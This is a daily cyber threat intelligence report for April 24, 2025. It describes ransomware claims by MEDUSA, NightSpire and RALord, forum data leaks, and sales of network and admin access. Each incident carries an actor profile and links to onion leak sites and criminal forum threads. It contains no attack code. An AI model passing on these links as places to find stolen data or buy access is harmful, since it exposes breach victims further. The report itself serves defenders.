[April-24-2025] Daily Cybersecurity Threat Report

Posted on

1. Executive Summary

This report details significant cybersecurity incidents observed within the approximate 24-hour period leading up to April 24, 2025, based on analyzed intelligence feeds. The period was marked by continued high levels of ransomware activity, persistent data breach incidents facilitated through illicit online forums, and a thriving market for initial network access credentials.

Ransomware remains a dominant threat vector, with three distinct Ransomware-as-a-Service (RaaS) operations – MEDUSA, NightSpire, and RALord – identified targeting organizations across government administration, consumer services, non-profit, and manufacturing sectors in the US and Europe. These groups employ double extortion tactics, threatening data publication alongside encryption. Data breaches and leaks continue unabated, with actors leveraging underground forums like DarkForums.st and Leakbase.io to advertise or release compromised datasets, including sensitive user credentials, personal identifiable information (PII), and financial records from entities ranging from cybercrime forums themselves to banks and non-profit organizations.

The market for initial access remains highly active, demonstrating the specialization within the cybercrime economy. Actors such as ‘Incognito’, ‘Zimmer’, and ‘PaniTo’ were observed selling Remote Desktop Protocol (RDP), Virtual Private Network (VPN), and administrative access credentials on forums including XSS.is and DarkForums.st. This activity significantly lowers the barrier to entry for subsequent, more damaging attacks, particularly ransomware deployment.

Key threat actors observed include the established MEDUSA RaaS group 1, continuing its campaign against critical sectors, and emerging RaaS groups NightSpire 3 and RALord 5, rapidly establishing their presence. Various Initial Access Brokers (IABs) 7 and data leakers (‘krekti’, ‘goldshark11’, ‘listen0022’) 9 underscore the diverse roles within the threat landscape.

Observed trends highlight the continued prevalence and professionalization of the RaaS model, the critical enabling role of IABs, the resilience of cybercrime forums despite law enforcement actions, and the opportunistic nature of targeting across a wide array of industries and geographical locations.

2. Detailed Incident Analysis

Incident 1: Appalachian Regional Commission falls victim to MEDUSA Ransomware

  • Summary: The MEDUSA ransomware group has claimed responsibility for compromising the Appalachian Regional Commission (ARC), an entity operating within the US Government Administration sector. This incident is categorized as Ransomware. The threat actors assert they have exfiltrated a range of sensitive data, including identification documents, marriage certificates, financial reports, contact details, and employee addresses. Publication of this data is threatened within 10-11 days on the group’s leak site.
  • Threat Actor Profile: MEDUSA
  • Background & TTPs: MEDUSA operates as a Ransomware-as-a-Service (RaaS) platform, with activity tracked since at least June 2021.1 Initially functioning as a closed group, MEDUSA transitioned to an affiliate-based model. This involves recruiting Initial Access Brokers (IABs) through cybercriminal forums, sometimes offering substantial compensation ranging from $100 to $1 million USD for exclusive access provision.1 MEDUSA employs a double extortion strategy, involving both data encryption and the threat of leaking exfiltrated data if ransom demands are not met. Data leaks are facilitated through their dedicated Tor-based “Medusa Blog” and a public Telegram channel named “information support”.11 Common Tactics, Techniques, and Procedures (TTPs) include initial access via phishing campaigns or the exploitation of unpatched software vulnerabilities.2 Once access is gained, actors utilize living-off-the-land (LOTL) techniques, heavily relying on PowerShell, Windows Management Instrumentation (WMI), and utilities like certutil.exe for execution, enumeration, and defense evasion.1 Command obfuscation techniques, such as Base64 encoding and string manipulation, are employed to hinder detection.1 Legitimate network scanning tools like Advanced IP Scanner and SoftPerfect Network Scanner are used for discovery.1 There is evidence suggesting potential exploitation of Microsoft Exchange Server vulnerabilities 11 and the use of kernel drivers designed to terminate security products.11 To increase pressure, MEDUSA often provides victims with options to purchase time extensions for leak deadlines, for example, at a cost of $10,000 per day.2
  • Operational History & Targets: As of early 2025, MEDUSA actors have reportedly compromised over 300 organizations.1 Their targeting spans a wide range of critical infrastructure sectors, including government, healthcare, education, legal services, insurance, technology, and manufacturing.1 The group gained significant notoriety following incidents such as the breach of Minneapolis Public Schools.14 While operating globally, MEDUSA demonstrates a pronounced focus on targeting organizations within the United States.11 Reported ransom demands have shown considerable variability, ranging from $100,000 to as high as $15 million USD.2 Some reporting suggests the group operating MEDUSA may be known as “Spearwing”.2
  • Relevance to Incident: The targeting of the Appalachian Regional Commission, a US Government Administration-affiliated entity, aligns directly with MEDUSA’s established victimology, which includes critical infrastructure and a focus on US-based organizations.1 The types of data claimed to be compromised (IDs, financial reports, employee PII) are consistent with sensitive information typically exfiltrated by ransomware groups for double extortion purposes.1 The stated 10-11 day deadline for data publication corresponds with MEDUSA’s standard operating procedure of using countdown timers on their leak site to exert pressure on victims.11 The sophisticated RaaS model allows MEDUSA to scale operations effectively.1 Recruitment of specialized IABs indicates a functional division of labor, enabling the core group to concentrate on malware development and extortion management.1 The use of both a dedicated leak site and a public Telegram channel maximizes visibility and pressure.11 This structured, business-like approach signifies a high degree of operational maturity, positioning MEDUSA as a significant and persistent threat, particularly to sensitive sectors like government administration.
  • Incident Details & Potential Impact: The data allegedly compromised in this incident includes highly sensitive Personally Identifiable Information (PII), such as IDs and marriage certificates, alongside confidential organizational data like fund reports and invoices, and employee contact details and addresses. Public release of this information could lead to severe consequences, including identity theft, financial fraud targeting individuals and the organization, significant reputational damage for ARC, operational disruptions, and considerable distress for affected employees and potentially associated individuals. The double extortion model places ARC under substantial pressure to negotiate or pay the ransom demand to prevent data exposure.
  • Evidence:
  • Published URL: http://s7lmmhlt3iwnwirxvgjidl6omcblvw2rg75txjfduy73kx5brlmiulad.onion/detail?id=5a5c1f956bb0b7c010293c41ad470f67
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/6e8353e2-112b-458d-b2ed-01a9fa5f6d26.png, https://d34iuop8pidsy8.cloudfront.net/04c21bb9-0ed4-4af3-9a46-7487dba6f8aa.png

Incident 2: Alleged data breach of Breached.fi

  • Summary: The threat actor ‘krekti’ has claimed a data leak originating from Breached.fi, identified as an Information Services platform likely operating within the cybercrime forum ecosystem, potentially connected to the lineage of BreachForums. This incident is categorized as a Data Breach. The actor alleges the compromised data includes user credentials (usernames, hashed passwords), email addresses, IP addresses, registration and login timestamps, and other user-associated details. The claim was posted on the ‘darkforums.st’ platform.
  • Threat Actor Profile: krekti
  • Background & TTPs: ‘krekti’ is the actor claiming responsibility for this data leak on the ‘darkforums.st’ forum. While specific intelligence on ‘krekti’ is not available from the provided materials, their actions place them squarely within the ecosystem of cybercrime forums dedicated to the trade and leakage of compromised data. Platforms like the various iterations of BreachForums 10 and similar sites 17 function as marketplaces where stolen credentials, databases, hacking tools, and other illicit services are exchanged.10 Participants range from sophisticated threat actors to individuals trading data often sourced from infostealer malware infections.9 The act of leaking data from a rival or related forum can be motivated by various factors, including building reputation, causing disruption, or enacting retaliation against competitors.
  • Operational History & Targets: The specific operational history of ‘krekti’ remains unknown based on available information. Their current target is a cybercrime forum itself, a phenomenon not uncommon within the volatile underground community. For instance, the database of the original BreachForums was itself leaked online.10
  • Relevance to Incident: ‘krekti’ is operating as a data leaker or trader, utilizing a known cybercrime platform (‘darkforums.st’) to publicize an alleged breach of another similar platform (‘Breached.fi’). This behavior is characteristic of interactions within this ecosystem.10 The types of data allegedly compromised – credentials, email addresses, IP addresses – represent standard commodities frequently traded on such forums.9 The cybercrime forum landscape is notoriously unstable, subject to frequent law enforcement takedowns (e.g., RaidForums, multiple BreachForums seizures) and subsequent reemergences or replacements.10 Internal conflicts and competition for status are rife.18 Leaking data from a competitor serves to damage the rival’s reputation, potentially attract users to the hosting forum, and enhance the leaker’s own standing.10 This incident exemplifies the inherent risks and often self-destructive dynamics present within these illicit online marketplaces.
  • Incident Details & Potential Impact: If the leaked data is authentic, it poses a significant risk to users of Breached.fi, who are likely individuals involved in or researching cybercrime. Exposed email addresses and hashed passwords can be exploited for credential stuffing attacks against other online services, targeted phishing campaigns, or attempts to identify individuals behind online aliases. Leaked IP addresses and timestamps could further aid de-anonymization efforts by law enforcement agencies or rival malicious actors. This incident inherently damages the reputation and perceived operational security of the Breached.fi platform.
  • Evidence:
  • Published URL: https://darkforums.st/Thread-Breached-fi-Anastasia-Owner-Mail-password-salt-IP
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/08ec60f8-2dd6-4d05-883d-23b8ea665d72.png

Incident 3: Conditioned Air Company falls victim to MEDUSA Ransomware

  • Summary: The MEDUSA ransomware group claims another victim: Conditioned Air Company, LLC, a US-based company operating in the Consumer Services sector (likely HVAC or similar). This attack is categorized as Ransomware. The group alleges exfiltration of data including blueprints, photographs, maps, financial slips, reports, phone numbers, addresses, and invoice bills. Publication of the data is threatened within 8-9 days.
  • Threat Actor Profile: MEDUSA
  • Background & TTPs: (Refer to Incident 1 profile) MEDUSA operates as a RaaS group known for double extortion via its “Medusa Blog” and Telegram channel, recruitment of IABs, targeting diverse sectors, and employing specific TTPs like LOTL techniques and PowerShell abuse.1
  • Operational History & Targets: (Refer to Incident 1 profile) MEDUSA has a history of targeting various sectors, including manufacturing and other commercial entities, with a significant number of victims located in the US.1 While known for targeting critical infrastructure 1, MEDUSA’s victimology demonstrates opportunistic targeting across a broader range of commercial entities.11 This opportunistic approach likely stems from the RaaS model, where affiliates or IABs may target organizations based on perceived vulnerability or ease of access rather than solely strategic value.20 Less prominent commercial entities might possess weaker security postures, presenting easier targets for affiliates.
  • Relevance to Incident: The targeting of a US-based Consumer Services company aligns with MEDUSA’s broad, often opportunistic targeting strategy.1 The types of data claimed (blueprints, reports, invoices, contact details) represent typical business-sensitive information leveraged in extortion schemes.1 The 8-9 day deadline is consistent with their practice of using time pressure to compel payment.11 This incident reinforces that organizations outside traditionally defined “critical” sectors remain significant targets for major RaaS operations if vulnerabilities are present.
  • Incident Details & Potential Impact: The compromise potentially involves sensitive intellectual property (blueprints, maps), confidential operational data (reports, slips), financial records (invoices), and potentially customer or employee PII (phone numbers, addresses). Public disclosure could lead to the loss of proprietary designs, operational disruption, facilitation of fraud, damage to the company’s reputation, and potential privacy violations depending on the specific nature of the contact information compromised.
  • Evidence:
  • Published URL: http://s7lmmhlt3iwnwirxvgjidl6omcblvw2rg75txjfduy73kx5brlmiulad.onion/detail?id=266d0184675acdf35fcce37c0e4fd529
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/796067da-94eb-412c-b678-443a29f6284d.png, https://d34iuop8pidsy8.cloudfront.net/c7ae1f94-5fbe-4f27-bf71-6ff1e8470e6b.png

Incident 4: Alleged sale of unauthorized access to multiple companies (Densay)

  • Summary: The threat actor ‘Incognito’ is advertising the sale of Remote Desktop Web Access (RDWeb) and VPN access for multiple companies on the XSS.is forum. Densay, an automotive company based in the UAE, is specifically named as one of the victims. This activity is categorized as an Initial Access sale.
  • Threat Actor Profile: Incognito
  • Background & TTPs: ‘Incognito’ operates as an Initial Access Broker (IAB). IABs are specialized cyber threat actors who gain unauthorized access to networks and then sell this access to other criminals, frequently ransomware operators.7 Common methods for gaining access include exploiting vulnerabilities in remote access services like RDP and VPNs, phishing campaigns, brute-force attacks, password spraying, or utilizing credentials stolen via infostealer malware.8 IABs typically advertise the type of access obtained (e.g., RDP, VPN, Active Directory credentials, web shells, control panel access) on underground forums such as XSS.is and Exploit.in.20 Advertisements often include general victim information like industry sector and revenue, sometimes anonymizing the specific company, though direct naming also occurs.23 ‘Incognito’ is offering RDWeb (a component related to RDP) and VPN access, both common and valuable types of access sold by IABs.8 The XSS.is forum is a well-known marketplace for IAB activities.23
  • Operational History & Targets: Specific historical activity for ‘Incognito’ is not detailed in the available materials. IABs often target organizations opportunistically, based on discoverable vulnerabilities or the availability of compromised credentials.20 The mention of a UAE-based automotive firm indicates their operational scope can be international and diverse.
  • Relevance to Incident: The actions attributed to ‘Incognito’—selling verified VPN and RDWeb access on the XSS.is forum—are entirely consistent with the definition and typical operational patterns of an IAB.7 The public nature (within the cybercrime community) of IAB marketplaces like XSS.is provides a potential, though challenging, source of early warning intelligence. IABs need to advertise their access to attract buyers.20 These advertisements, even if partially anonymized, contain valuable clues.23 Proactive monitoring of these forums can allow organizations to detect if their access is being sold before a major attack, like ransomware deployment, is launched.22 This incident serves as a real-time example of such intelligence being available.
  • Incident Details & Potential Impact: The availability of verified RDWeb and VPN access for sale presents an immediate and severe security risk to the victim organizations, including Densay. Purchasers of this access, such as ransomware groups, data thieves, or state-sponsored actors, gain a direct foothold into the target networks. This effectively bypasses the often difficult initial intrusion phase, significantly accelerating the timeline for attacks like ransomware deployment, large-scale data exfiltration, espionage, or sabotage.8
  • Evidence:
  • Published URL: https://xss.is/threads/136640/
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/3cbcdfcb-1c9e-41a3-9b22-7b5bf5bea636.png

Incident 5: Alleged Data Leak of Vietnam Bank

  • Summary: The threat actor ‘goldshark11’ claims on the darkforums.st platform to have obtained and leaked data from an unspecified bank in Vietnam. This incident is categorized as a Data Leak. The actor alleges the compromised data includes highly sensitive PII (12-digit ID cards, full names, dates of birth, permanent addresses) and financial information (current bank account balances). Sample screenshots were provided as purported proof.
  • Threat Actor Profile: goldshark11
  • Background & TTPs: ‘goldshark11’ is functioning as a data leaker and potential seller on the darkforums.st cybercrime forum. Specific intelligence regarding this actor is not present in the provided materials. Their actions align with common practices observed on such forums, where actors advertise, leak, or sell databases acquired through various means, including direct hacking, purchasing from other criminals, or exploiting system vulnerabilities.10 Providing data samples is a standard tactic to demonstrate the authenticity and value of the compromised data to potential buyers or to gain notoriety within the community.9 Financial institutions are frequent targets due to the inherent value of the financial and personal data they hold.27
  • Operational History & Targets: Specific operational history for ‘goldshark11’ is unknown. The current target is identified as the Vietnamese banking sector.
  • Relevance to Incident: ‘goldshark11’ is utilizing a known cybercrime forum (‘darkforums.st’) to advertise allegedly stolen, highly sensitive financial and personal data originating from a bank. The provision of samples is a typical method to validate the claim. This behavior fits the established pattern of data leak and sale activities prevalent in the cybercrime underground.16 The targeting of a specific geographic region (Vietnam) and the claim of possessing highly sensitive data types (national IDs, bank balances) suggest a potentially significant compromise. Financial data combined with detailed PII is exceptionally valuable for sophisticated fraud and identity theft.18
  • Incident Details & Potential Impact: If the data leak is authentic, the consequences are extremely severe. The exposure of national identification numbers, full personal details, addresses, and particularly current bank account balances poses a massive risk to the affected bank customers. This information can fuel targeted financial fraud, identity theft, highly personalized social engineering attacks, and significant financial losses. For the unnamed Vietnamese bank, this represents a major security breach, likely resulting in substantial reputational damage, loss of customer trust, significant remediation costs, and potential regulatory penalties. The inclusion of bank balances is particularly alarming as it allows attackers to prioritize high-value targets.
  • Evidence:
  • Published URL: https://darkforums.st/Thread-vietnam-bank
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/bb9c2cf9-836d-40f4-b6f7-62d86ac566bc.png

Incident 6: Alleged Leak of USA Human Rights Database

  • Summary: Threat actor ‘listen0022’ claims on the leakbase.io forum to have obtained and leaked a database associated with “USA Human Rights,” categorized under the Non-profit & Social Organizations industry. This incident is classified as a Data Leak. The compromised data purportedly includes first names, last names, email addresses, place/location information, phone numbers, and addresses.
  • Threat Actor Profile: listen0022
  • Background & TTPs: ‘listen0022’ is identified as a data leaker operating on cybercrime forums, specifically leakbase.io in this instance. No specific background information on this actor is available from the provided materials. Their modus operandi involves advertising a database containing PII (names, various contact details) allegedly sourced from a non-profit or social organization. This activity is consistent with behaviors observed on platforms like BreachForums and similar data leak sites.10 The motivation behind such leaks can be financial (selling the database), reputational gain within the cybercrime community, or potentially ideological if targeting a specific type of organization. Leakbase.io serves a similar function to other forums dedicated to the distribution of compromised data.
  • Operational History & Targets: Specific operational history for ‘listen0022’ is unknown. The current target is described vaguely as a “USA Human Rights Database,” likely belonging to a non-profit organization operating within that field.
  • Relevance to Incident: ‘listen0022’ is performing a typical data leak operation: advertising the availability of PII allegedly stolen from a specific type of organization (non-profit/human rights) on a dedicated forum.18 Non-profit organizations are recognized targets for various threat actors.1 Data leaks involving such organizations carry unique risks beyond purely financial motivations. These groups often handle sensitive information related to vulnerable individuals, activists, or politically charged issues. Furthermore, they may possess fewer cybersecurity resources compared to large corporations.19 Data exfiltrated from these organizations can be weaponized by state-sponsored actors, political adversaries, or extremist groups for purposes such as intimidation, surveillance, suppression of dissent, or targeted harassment, extending the impact far beyond monetary loss.19
  • Incident Details & Potential Impact: The public release of names, email addresses, phone numbers, and physical addresses associated with a human rights organization presents potentially severe risks. Individuals listed in the database – who could be activists, donors, staff members, volunteers, or beneficiaries of the organization’s services – could become targets for harassment, doxing (maliciously publishing private information), sophisticated phishing attacks, social engineering, or even physical threats. The level of risk depends heavily on the specific nature of the organization and the motives of adversaries who might acquire the data. The organization itself faces significant reputational damage, loss of trust from its constituents, and potential legal or regulatory consequences related to data protection.
  • Evidence:
  • Published URL: https://leakbase.io/threads/usa-humanrights-database.37966/
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/6a406bfa-cc8f-4717-8d16-9d77e396aa3a.png

Incident 7: KAL EGY 319 targets the website of Aqua General

  • Summary: The group identifying itself as ‘KAL EGY 319’ claims to have defaced the website of Aqua General, a manufacturing company based in Egypt. This incident is categorized as Defacement. The claim was disseminated via a Telegram channel.
  • Threat Actor Profile: KAL EGY 319
  • Background & TTPs: ‘KAL EGY 319’ appears to operate as a website defacement group. Website defacement typically involves unauthorized alteration of a website’s visual content, often to display political messages, promote hacktivist agendas, gain notoriety, or simply cause disruption. This type of attack is generally considered less sophisticated compared to data breaches or ransomware deployment. The use of Telegram for broadcasting claims is a common practice among various threat actors, including hacktivist groups, ransomware operators, and others seeking publicity.4 The name component “EGY” might suggest an Egyptian origin or a specific focus on Egyptian targets. The provided search results (28 through 29) appear unrelated and offer no specific intelligence on this group or its activities.
  • Operational History & Targets: Specific operational history for ‘KAL EGY 319’ is unknown. The current identified target is an Egyptian manufacturing company, Aqua General.
  • Relevance to Incident: The group’s actions – performing a website defacement and announcing it via Telegram – are consistent with the behavior patterns of hacktivist entities or groups focused on low-level disruption and visibility. While often dismissed as mere “digital graffiti,” website defacement serves as a clear indicator of a successful intrusion. It signifies that an attacker was able to bypass security controls to gain sufficient access to modify website content. The underlying vulnerability exploited for the defacement – whether weak credentials, an unpatched content management system, or a server misconfiguration – might potentially be leveraged for more severe attacks, such as data exfiltration, malware distribution, or deeper network compromise. Therefore, a defacement should be treated as a warning sign of a potentially weak security posture requiring thorough investigation.
  • Incident Details & Potential Impact: The primary impact of website defacement is reputational damage to the targeted organization and temporary disruption of the website’s normal function and appearance. It clearly indicates a security vulnerability has been exploited. While generally less severe in direct impact than data breaches or ransomware, defacement can erode customer and public trust and necessitates security resources to restore the website, investigate the intrusion vector, and remediate the underlying vulnerability to prevent further exploitation.
  • Evidence:
  • Published URL: https://t.me/KALE3G1Y9/383
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/fc689392-8af1-4fb2-938a-406174a08810.png

Incident 8: MFR CULTIVONS LES REUSSITES falls victim to NightSpire Ransomware

  • Summary: The emerging ransomware group NightSpire has claimed responsibility for an attack against MFR CULTIVONS LES REUSSITES, identified as a Non-profit & Social Organization based in France (the name suggests a focus on rural education or development). This incident is categorized as Ransomware. The actors claim to have exfiltrated 1 Terabyte (TB) of data and threaten to publish it on their Tor-based leak site within 5-6 days.
  • Threat Actor Profile: NightSpire
  • Background & TTPs: NightSpire is a relatively new ransomware and extortion operation, observed to be active since early March 2025.3 The group operates a dedicated leak site on the Tor network, first identified around mid-March 2025.3 Intelligence suggests the operators, potentially using aliases like ‘xdragon128’ and ‘cuteliyuan’, may possess limited experience, indicated by missteps such as attempting ransomware affiliate recruitment on forums where such activity is explicitly banned.3 Their primary motivation appears to be financial gain, and targeting seems opportunistic.3 Known TTPs include exploiting vulnerabilities in external perimeter services for initial access (specifically citing CVE-2024-55591 affecting FortiOS).3 They utilize legitimate file transfer tools (e.g., WinSCP, MEGACmd) and living-off-the-land binaries (LOLBins) for data exfiltration and defense evasion.3 The group shows signs of attempting to expand its operations, having advertised for negotiation specialists.3 It is important to distinguish NightSpire from the similarly named, but distinct and older, “Night Sky” ransomware group.30 The ransomware ecosystem is dynamic, constantly seeing new entrants.31 These groups often emerge to fill voids left by disrupted operations (like the recent actions against LockBit and ALPHV 13) or may leverage leaked source code from older ransomware families.30 Even groups with seemingly inexperienced operators can pose a significant threat by utilizing available toolkits and exploiting common vulnerabilities. Establishing a leak site and claiming victims is a critical step for new groups to build a reputation and exert pressure.11
  • Operational History & Targets: As an emerging group active since February/March 2025 3, NightSpire had claimed responsibility for at least 11 victims by late March/early April 2025.3 Initial targets were primarily small to medium-sized businesses across sectors including manufacturing, retail, chemical, maritime, and accounting services.3 Victims were identified in the United States, Japan, Thailand, the United Kingdom, China, and Poland.4 This incident adds France to their geographic scope and the Non-profit sector to their victimology.
  • Relevance to Incident: This attack aligns with NightSpire’s established modus operandi: utilizing a Tor leak site for extortion 3, imposing a short deadline for data publication to pressure the victim, and targeting organizations within Europe.4 The claim of exfiltrating a large volume of data (1 TB) is typical rhetoric used in ransomware attacks to emphasize the severity of the breach. Targeting a non-profit organization fits with the group’s observed opportunistic approach.3
  • Incident Details & Potential Impact: The compromise of 1 TB of data from a non-profit or educational organization could involve the exposure of highly sensitive information. This might include personal records of students, beneficiaries, or members; staff PII and employment details; confidential financial data and donor information; proprietary research or educational materials; or internal operational plans. Public disclosure of such data could lead to severe privacy violations, significant reputational damage, potential breaches of data protection regulations (such as GDPR in France), operational disruption, and loss of trust from stakeholders. The large claimed volume of exfiltrated data, if accurate, suggests extensive network penetration.
  • Evidence:
  • Published URL: http://nspireyzmvapgiwgtuoznlafqvlyz7ey6himtgn5bdvdcowfyto3yryd.onion/datas.php
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/dee8a482-7a10-4fb7-bfd1-819f19deb5b9.png

Incident 9: Alleged sale of access to an unidentified US OpenCart platform

  • Summary: Threat actor ‘Zimmer’ is advertising on the exploit.in forum the sale of access to a compromised e-commerce store based in the US that utilizes the OpenCart platform. This incident is categorized as an Alert, specifically involving the sale of Initial Access. Access was reportedly gained via SQL injection. The offering includes administrator account hashes, direct panel access, and the option for the buyer to upload a web shell. The compromised site uses Authorize.net for payment processing.
  • Threat Actor Profile: Zimmer
  • Background & TTPs: ‘Zimmer’ is operating as an IAB, specializing in compromising and selling access to websites, particularly e-commerce platforms. Their reported method involves exploiting a specific technical vulnerability, SQL injection (SQLi), to achieve administrative-level access. The actor is offering various levels of access (admin credentials, panel access, web shell upload capability), catering to the diverse needs and technical capabilities of potential buyers. The sale is taking place on exploit.in, a known underground forum where illicit goods and services, including network access, are traded.27 Access involving payment gateways like Authorize.net is considered particularly valuable within the cybercrime economy.27 The exploitation of specific technical vulnerabilities like SQLi is a common method for IABs to gain initial access.20 This access is then packaged and sold, effectively commoditizing the vulnerability.8 Buyers, who may lack the skills to find or exploit vulnerabilities themselves, can purchase the resulting access to facilitate their own malicious activities, such as deploying payment card skimmers or ransomware.20
  • Operational History & Targets: Specific operational history for ‘Zimmer’ is unknown. The current target is an unnamed US-based e-commerce website running OpenCart and utilizing Authorize.net. IABs frequently target platforms known for common vulnerabilities or misconfigurations.8
  • Relevance to Incident: ‘Zimmer’s’ reported actions – exploiting a web vulnerability (SQLi), obtaining administrative access, and offering it for sale on a known cybercrime forum (exploit.in) – are characteristic behaviors of an IAB.8 Offering the capability to upload a web shell significantly increases the potential impact and value of the access, as it allows for persistent and deeper compromise of the server.20
  • Incident Details & Potential Impact: Gaining administrative access to an e-commerce platform, especially one integrated with a payment processor like Authorize.net, represents a highly critical security breach. A buyer of this access could potentially steal customer PII, including names, addresses, and crucially, payment card details. They could inject malicious JavaScript (digital skimmers, often associated with Magecart attacks) to capture payment information in real-time, redirect legitimate payments to fraudulent accounts, deface the website, or use the compromised server to host malware or launch further attacks. The underlying SQL injection vulnerability itself indicates a severe security flaw in the website’s code or configuration. The ability to upload a web shell grants the attacker persistent, server-level access, compounding the risk. This poses an immediate and severe threat to the operational integrity of the e-commerce store, the financial security of its customers, and its overall reputation.
  • Evidence:
  • Published URL: https://forum.exploit.in/topic/257940/
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/c31448c2-0ac6-4b8b-8298-875ef715436e.png

Incident 10: HELUKABEL GmbH falls victim to RALord Ransomware

  • Summary: The emerging ransomware group RALord claims to have compromised HELUKABEL GmbH, a company specializing in Electrical & Electronic Manufacturing based in Germany. This incident is categorized as Ransomware. The threat actors allege the exfiltration of 30 Gigabytes (GB) of data and are threatening its publication within 5-6 days via their dedicated leak site on the Tor network.
  • Threat Actor Profile: RALord
  • Background & TTPs: RALord is identified as a new Ransomware-as-a-Service (RaaS) group, with activity first noted around March 25, 2025.5 The group operates within the infrastructure of the NOVA RaaS platform, adhering to a typical affiliate revenue split (85% for the affiliate, 15% for the platform operators), but distinctively also offers its encryption tool as a standalone product.5 RALord employs a multi-faceted extortion strategy that includes operating a Tor-based data leak site (DLS). On this site, they not only list victims and leak data but also publish detailed reports about their attacks, sometimes specifically naming security products they claim to have bypassed and highlighting perceived poor security hygiene within the victim organization.5 This tactic aims to maximize pressure through public humiliation and reputational damage. The group utilizes at least two ransomware payload variants: one appending the “.nova” extension (likely distributed widely by affiliates) and a more advanced, reportedly Rust-based variant developed in-house by RALord, which appends the “.RALord” extension.5 Communication with victims often occurs via secure messaging applications like qTox.5 RALord actively recruits affiliates, seeking individuals with skills in Rust and Python programming, CVE exploitation, network penetration, and security measure bypass techniques.5 While unconfirmed, potential links to the older RAWorld (or RAGroup) ransomware operation have been suggested due to naming similarities and operational aspects.6 RAWorld itself has recently updated its toolset and uses a payload based on the leaked Babuk ransomware source code.32 The emergence of new groups like RALord, equipped with sophisticated technical capabilities (like Rust-based payloads) and employing advanced psychological extortion tactics (detailed public shaming), indicates an increasing level of sophistication and competition within the RaaS landscape.5 These groups compete not only on the effectiveness of their encryption but also on the creativity and impact of their multi-layered extortion strategies.
  • Operational History & Targets: As a recently emerged group (late March 2025) 5, RALord’s initial list of claimed victims included organizations across various sectors such as healthcare, education, hospitality, IT services, media, construction, agriculture, and engineering.5 Geographically, victims were located in Norway, Portugal, the United Arab Emirates, Saudi Arabia, Taiwan, Brazil, Spain, France, and Argentina.5 This incident adds Germany to their geographic targets and the Electrical & Electronic Manufacturing sector to their industry victimology.
  • Relevance to Incident: The targeting of a European manufacturing company falls within RALord’s known operational scope regarding geography and industry sectors.5 The use of a Tor-based leak site with a short publication deadline aligns with their established extortion methodology.5 The claim of exfiltrating 30 GB of data is a standard component of such ransomware claims.
  • Incident Details & Potential Impact: A compromise of an electrical and electronic manufacturing company like HELUKABEL GmbH could result in the exposure of highly valuable and sensitive information. This could include proprietary product designs and schematics, detailed manufacturing processes, supplier and customer lists containing confidential business information, internal financial data, and employee PII. The public release or sale of such data could lead to intellectual property theft by competitors, significant competitive disadvantage, disruption to the supply chain, severe reputational damage, and potential regulatory fines, particularly under regimes like GDPR.
  • Evidence:
  • Published URL: http://ralord3htj7v2dkavss2hjzviviwgsf4anfdnihn5qcjl6eb5if3cuqd.onion/HELUKABEL/
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/68814899-26b6-4e9c-9760-2d9942a289c8.png

Incident 11: Alleged sale of admin access to State Secretariat for Culture and Creative Economy of Rio de Janeiro

  • Summary: The threat actor ‘PaniTo’ is advertising on the darkforums.st platform the sale of administrator-level access to the official website (cultura.rj.gov.br) of the State Secretariat for Culture and Creative Economy of Rio de Janeiro (SECEC-RJ) in Brazil. This incident is categorized as an Initial Access sale. The website is noted as being used for managing cultural policies, events, and funding opportunities within the region.
  • Threat Actor Profile: PaniTo
  • Background & TTPs: ‘PaniTo’ functions as an IAB, specializing in the sale of high-privilege (administrator) access, specifically targeting government websites. While specific intelligence on ‘PaniTo’ is absent from the provided materials, their TTP involves identifying vulnerabilities in or compromising credentials for government web portals and subsequently monetizing this access by selling it on cybercrime forums like darkforums.st. Selling administrator access grants the buyer extensive control over the website’s content, functionality, and potentially associated databases or underlying server infrastructure.20 Latin America, including Brazil and Argentina, is a region frequently targeted by various cyber threats, including phishing campaigns deploying Remote Access Trojans (RATs) and malware distribution efforts targeting government and other sectors.33 Government websites are attractive targets for IABs due to the potential value of the access to various downstream actors, including hacktivists, state-sponsored groups, and financially motivated criminals.20
  • Operational History & Targets: Specific operational history for ‘PaniTo’ is unknown. Their current identified targets include this Brazilian state government cultural agency website and, as detailed in Incident 12, an Argentinian provincial government website.
  • Relevance to Incident: ‘PaniTo’ is engaging in activity characteristic of an IAB: selling privileged access (administrator level) to a specific, potentially high-value target (a government website) on a known underground forum.8 The focus on Latin American government entities aligns with broader threat activity observed in the region.33 This incident underscores the vulnerability of public sector digital infrastructure to compromise and subsequent monetization via the IAB market.
  • Incident Details & Potential Impact: Gaining administrator access to a government cultural agency’s website poses significant risks. A malicious actor purchasing this access could deface the site to spread propaganda or misinformation, disrupt the management of cultural events and funding programs, steal sensitive data submitted through the site (such as personal information from grant applicants or artists), or potentially use the compromised website as a pivot point to attack other connected government systems. Such actions could lead to severe reputational damage for the agency, operational chaos, data breaches violating privacy, and an erosion of public trust in government digital services.
  • Evidence:
  • Published URL: https://darkforums.st/Thread-I-sell-Admin-Access-of-cultura-rj-gov-br
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/030fde54-dd09-489c-b2e5-b653d500422e.png
  • Summary: The threat actor ‘PaniTo’, also responsible for Incident 11, claims on darkforums.st to be selling administrator access to another government website: the official portal (personasjuridicas.chaco.gov.ar) for the General Inspection of Legal Entities and Public Registry of Commerce in the Chaco Province of Argentina. This incident is categorized as an Initial Access sale.
  • Threat Actor Profile: PaniTo
  • Background & TTPs: (Refer to Incident 11 profile) ‘PaniTo’ is identified as an IAB specializing in compromising and selling administrator-level access to government websites in Latin America, utilizing forums like darkforums.st for sales.20
  • Operational History & Targets: Specific history remains unknown. Current targets demonstrably include government websites in both Brazil (cultural agency) and Argentina (provincial commerce registry). Observing the same IAB offering multiple, similar high-value accesses (admin level to LATAM government sites) concurrently on the same platform provides stronger evidence of the actor’s capabilities and focus. This pattern might suggest the actor has developed specific skills, is exploiting common vulnerabilities across regional government platforms, or is conducting a targeted campaign. It highlights potential systemic weaknesses within the targeted sector or region.
